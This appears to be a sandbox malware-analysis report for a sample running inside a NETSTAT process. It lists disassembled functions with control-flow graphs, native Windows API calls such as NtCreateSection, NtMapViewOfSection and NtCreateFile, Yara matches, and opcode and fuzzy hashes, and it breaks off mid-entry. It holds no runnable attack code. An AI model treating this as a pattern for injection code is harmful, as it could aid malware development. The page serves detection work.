                                                                                                                                                                                  Function 02EE9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 207 2ee9baf-2ee9bfe call 2ee9102 210 2ee9c0c-2ee9c9a call 2eeb942 * 2 NtCreateSection 207->210 211 2ee9c00 207->211 217 2ee9d5a-2ee9d68 210->217 218 2ee9ca0-2ee9d0a call 2eeb942 NtMapViewOfSection 210->218 212 2ee9c02-2ee9c0a 211->212 212->210 212->212 221 2ee9d0c-2ee9d4c 218->221 222 2ee9d52 218->222 224 2ee9d4e-2ee9d4f 221->224 225 2ee9d69-2ee9d6b 221->225 222->217 224->222 226 2ee9d6d-2ee9d72 225->226 227 2ee9d88-2ee9ddc call 2eecd62 NtClose 225->227 229 2ee9d74-2ee9d86 call 2ee9172 226->229 229->227
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$CloseCreateView
                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                  • API String ID: 1133238012-149943524
                                                                                                                                                                                  • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                                  • Instruction ID: 9cbad3ac0525d7af47ae1624e7ad01b63b1f68fec511176afe1c81f62c70fc2f
                                                                                                                                                                                  • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF617070518B488FCB58EF68D8856AEBBE0FB98314F50462EE98AC3651DB35D441CB86
                                                                                                                                                                                  Function 02EE9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 266 2ee9bb2-2ee9bef 267 2ee9bf7-2ee9bfe 266->267 268 2ee9bf2 call 2ee9102 266->268 269 2ee9c0c-2ee9c9a call 2eeb942 * 2 NtCreateSection 267->269 270 2ee9c00 267->270 268->267 276 2ee9d5a-2ee9d68 269->276 277 2ee9ca0-2ee9d0a call 2eeb942 NtMapViewOfSection 269->277 271 2ee9c02-2ee9c0a 270->271 271->269 271->271 280 2ee9d0c-2ee9d4c 277->280 281 2ee9d52 277->281 283 2ee9d4e-2ee9d4f 280->283 284 2ee9d69-2ee9d6b 280->284 281->276 283->281 285 2ee9d6d-2ee9d72 284->285 286 2ee9d88-2ee9ddc call 2eecd62 NtClose 284->286 288 2ee9d74-2ee9d86 call 2ee9172 285->288 288->286
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$CreateView
                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                  • API String ID: 1585966358-149943524
                                                                                                                                                                                  • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                  • Instruction ID: 4512d383d85cb6db1b1f9ef5c27c6c08e242325cf640c3020954d6c3870b2d2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7517E70618B488FCB58DF18D8956AEBBE0FB98314F50462EF98AC3651DF35D441CB86
                                                                                                                                                                                  Function 02EEA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 02EEA19F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                  • API String ID: 1778838933-4108050209
                                                                                                                                                                                  • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                  • Instruction ID: 8093d70e9349f9415b438ec668e1b59d86130cf822b19a57abe9b1d5ca19facf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3512D70914A8C8FDB69EF68C8946EEB7F5FB98305F40462EE44AD7250DF309645CB41
                                                                                                                                                                                  Function 026BA2EA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 542 26ba2ea-26ba2ee 543 26ba338-26ba381 call 26baf30 NtCreateFile 542->543 544 26ba2f0-26ba329 call 26baf30 542->544
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,026B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,026B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 026BA37D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 823142352-1441809116
                                                                                                                                                                                  • Opcode ID: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
                                                                                                                                                                                  • Instruction ID: 7b3a959a3df8fbc299cdf1006399ac394fa74f0ed4bd17a40ac70d8c1dc30002
                                                                                                                                                                                  • Opcode Fuzzy Hash: 60ba23054b50635cf57a664ecaabc91fb639b4254705df40474ddd73745a59cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF1107B2214209ABCB08DF98DC84DEB77ADAF8C314F05824DFA4DA7241C630E851CBA4
                                                                                                                                                                                  Function 026BA32A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 550 26ba32a-26ba346 551 26ba34c-26ba381 NtCreateFile 550->551 552 26ba347 call 26baf30 550->552 552->551
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,026B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,026B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 026BA37D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 823142352-1441809116
                                                                                                                                                                                  • Opcode ID: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
                                                                                                                                                                                  • Instruction ID: dd72b9ddf7405b2f38f17539773694100655d41165d83a3e48e64a8d794f6f9d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f0b03f65585031601ef09eec40b99b8fc33a98648d44dc91f8ac0b2b44fe10bd
                                                                                                                                                                                  • Instruction Fuzzy Hash: AE01A4B2251108ABCB08CF88DC94EEB77ADAF8C754F558248FA5D97245D630E8518BA4
                                                                                                                                                                                  Function 026BA330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 553 26ba330-26ba346 554 26ba34c-26ba381 NtCreateFile 553->554 555 26ba347 call 26baf30 553->555 555->554
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,026B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,026B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 026BA37D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID: .z`
                                                                                                                                                                                  • API String ID: 823142352-1441809116
                                                                                                                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                  • Instruction ID: 9efc3b2f30cf985662bbb32c5866e0ec34db4eda643cfadfe49972e47ffbaaa6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                                  • Instruction Fuzzy Hash: D6F0BDB2211208ABCB08CF88DC84EEB77EDAF8C754F158248BA0D97240C630E8518BA4
                                                                                                                                                                                  Function 026BA3E0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(026B4D72,5EB65239,FFFFFFFF,026B4A31,?,?,026B4D72,?,026B4A31,FFFFFFFF,5EB65239,026B4D72,?,00000000), ref: 026BA425
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                  • Instruction ID: bc75648c000a59e1df9a30607d3ca5aeb497269474b9012861ed2f17c67ddf2b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F0A4B2210208ABCB14DF89DC84EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                                                                                  Function 026BA3DA Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(026B4D72,5EB65239,FFFFFFFF,026B4A31,?,?,026B4D72,?,026B4A31,FFFFFFFF,5EB65239,026B4D72,?,00000000), ref: 026BA425
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                  • Instruction ID: 65395beba820119a57a0c7799aa2ca984b7778cbdf4bbdfd754c509fb86e4993
                                                                                                                                                                                  • Opcode Fuzzy Hash: e36ec178e8ffe1fe657c74cf8b232a2ea8ae32859f4c1d9b2af2f1176d4cfa76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F01DB2210148ABCB15DF98D890CEB7BADAF8C314B15869DFD4C97215C634E8558BA0
                                                                                                                                                                                  Function 026BA50A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,026A2D11,00002000,00003000,00000004), ref: 026BA549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
                                                                                                                                                                                  • Instruction ID: 4dc59ad37ec8fcb9927d57b4d43e84c7b9c05e26a9c96a53772a88ccd703a89a
                                                                                                                                                                                  • Opcode Fuzzy Hash: feba9c7679bc1ab7f4ebbbc94c28323aad5d88c0d8185c2a72d654f74b30e2de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F05EB6210104AFDB14CF88CC80EE77BA9AF8C314F158549FE489B241C230E811CFA0
                                                                                                                                                                                  Function 026BA510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,026A2D11,00002000,00003000,00000004), ref: 026BA549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                  • Instruction ID: d44e32cb740fb3931f763ce5715710c2481e44ec28b413e0a2dfa11e4f9a3d7a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F015B2210208ABCB14DF89CC80EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                  Function 026BA45E Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(026B4D50,?,?,026B4D50,00000000,FFFFFFFF), ref: 026BA485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
                                                                                                                                                                                  • Instruction ID: 6e7da38994247e03c3513e047d9ebf58301e78a82a345f55ee7d6fcd9cb66eba
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E0C272200204BFD720EFE4CC48EDB7B68EF44350F104459F94EAB242C130E5108B90
                                                                                                                                                                                  Function 026BA460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(026B4D50,?,?,026B4D50,00000000,FFFFFFFF), ref: 026BA485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026A0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_26a0000_NETSTAT.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                  • Instruction ID: a140a13cae6924b1c1ee7da8251163d6fce223989a995f2d94e8742e1d78be12
                                                                                                                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                  • Instruction Fuzzy Hash: 10D01776210214BBD720EBD8CC89EE77BADEF48760F154499BA589B242C530FA008BE0
                                                                                                                                                                                  Function 03112B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 34782b202cdd99a6eb0f6468805c328209a9fdf3d48684674299d58c59c08a0b
                                                                                                                                                                                  • Instruction ID: 66ec3c3fbc21ae507a9b0b2ee30055fb6b3722f6f7f9132f17495ed6fd3aab7f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34782b202cdd99a6eb0f6468805c328209a9fdf3d48684674299d58c59c08a0b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D900261202414034105B1584515616440A87E4201B56D021E1015590DCB2589A16225
                                                                                                                                                                                  Function 03112BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 840863af7fa6a053f94a01371f05639d782efef55b1a007ae16975ccbf0104f8
                                                                                                                                                                                  • Instruction ID: ace0c4f6ef9fda350e814cdfc9bbafc452d4370c3f40f0d49c4d144d04a9ac36
                                                                                                                                                                                  • Opcode Fuzzy Hash: 840863af7fa6a053f94a01371f05639d782efef55b1a007ae16975ccbf0104f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2690023120141C03D180B158450564A040587D5301F96D015A0026654DCF158B6977A1
                                                                                                                                                                                  Function 03112BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 0498aadced85d0e19f00b57256713bf3cd574e239cb24d3b0e395ccb41155bef
                                                                                                                                                                                  • Instruction ID: 31a9d8880e0858b0257573f5526980329eaf14720156614a4d8598466ee158d2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0498aadced85d0e19f00b57256713bf3cd574e239cb24d3b0e395ccb41155bef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6890023120545C43D140B1584505A46041587D4305F56D011A0065694D9B258E65B761
                                                                                                                                                                                  Function 03112AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: e6e4eb5ad416bb9a64e1d93f7c63717fd434550181810d6315f1e61ef1f7c818
                                                                                                                                                                                  • Instruction ID: 3c95fd689b41af5e333603676c0caf11599f227cbd03f829b5a349ff1ae3abf9
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e4eb5ad416bb9a64e1d93f7c63717fd434550181810d6315f1e61ef1f7c818
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52900435311414030105F55C07055070447C7DD351357D031F1017550CDF31CD715331
                                                                                                                                                                                  Function 03112F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 61f53778e923471606b0459482c2d17c83b935a81f21a9beed868e0694586b83
                                                                                                                                                                                  • Instruction ID: aafef6bdc01d3938ebbf94f5dbedf46b7f7b3031ea5c50214e2f3b5663d72f5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 61f53778e923471606b0459482c2d17c83b935a81f21a9beed868e0694586b83
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F90026134141843D100B1584515B060405C7E5301F56D015E1065554D8B19CD626226
                                                                                                                                                                                  Function 03112FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 827f590b6d08e665937d669d58de704b32ea987be062af39ed1929b4e7fafd33
                                                                                                                                                                                  • Instruction ID: 7f55115e9d873ab49f1192db6ef8366834d3c5a38183310b0b135968e100874d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 827f590b6d08e665937d669d58de704b32ea987be062af39ed1929b4e7fafd33
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58900221211C1443D200B5684D15B07040587D4303F56D115A0155554CCF1589715621
                                                                                                                                                                                  Function 03112EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
